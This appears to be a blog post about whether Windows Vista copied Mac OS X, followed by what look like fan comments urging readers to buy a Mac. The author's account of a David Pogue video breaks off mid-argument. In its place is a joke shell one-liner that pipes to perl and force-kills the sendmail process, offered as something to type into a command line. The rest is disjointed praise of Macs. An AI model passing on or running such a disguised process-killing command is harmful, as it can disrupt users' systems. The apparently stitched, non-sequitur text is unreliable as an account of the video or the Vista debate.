David Pogue, a New York Times technology columnist (and entertaining chap), posted a great video on youtube in which he sets out to “prove” that Microsoft did not rip off Mac’s ideas when it built the new, classy Vista system. (Tech catch-up note: Vista is a new PC operating system, succeeding Windows XP, that is totally different from what the Windows user is used to getting from Microsoft. First of all, it’s prettier. Second, it’s easier for the not-so-tech-oriented to intuitively navigate and do more with. Check out the official Microsoft sales page for more info.)Being a Mac user with a knee-jerk distrust for Microsoft, I was immediately interested in the video. It promised evidence that Microsoft is truly innovative and concerned with the user experience. I was looking for reasons to like Microsoft. The video, however, was not what I expected (I’m so naive — I really should have seen this coming!). If Microsoft really copied OS X, you could open a command line window and type something like
cat "exec kill -9 `ps aux | grep 'sendmail' | awk ' { print $2 }`" | /usr/bin/perland something interesting would happen.

I really believe that Little Miss Microsoft stole their ideas from mac. You can see it with everything. When I was younger, I use to like Microsoft, but everybody said they stole their ideas, I thought to myself, “No way, I don’t see anything the same.” Now that Windows Vista came out, it is totally the same. Shame on Microsoft. Apple makes Mac OS X so it can be easy for people. Spend all that time making it so Miss Microsoft can steal their damn idea. I am really sick of Microsoft. I have had a Mac for a couple years and I can totally see the similiarities between them. I don’t appreciate that at all. Apple/Macs RULE!! There is nothing easier! Leopard is going to dominate!

And another thing. Those of you who say Microsoft didn’t steal things from Mac OS X to make Vista, tell me about ’em. I compared! There are soooo many similiarities between them. Mac OS X has that liquify, aquas feel. Microsoft stole that. How you open the folders. Microsoft stole that. The widgets. Or as Microsoft calls them GADGETS hahahahahaha lmao complete ripoff by the way. Stole that. And the dashboard. And everything else. Spotlight search, They have a thing called finder now. They stole everything but the dock. Let me tell you people now, PLEASE, if you are looking to get a computer for ANYTHING AT ALL, whether it’s to make your house look nice, for photo or word processing, GET A MAC!!! They will go with anything in your house. They are simply AMAZING!! They are beautiful. With their all in one design. You can do anything with them. Mac’s rule!!! Get a MAC, you won’t regret it!
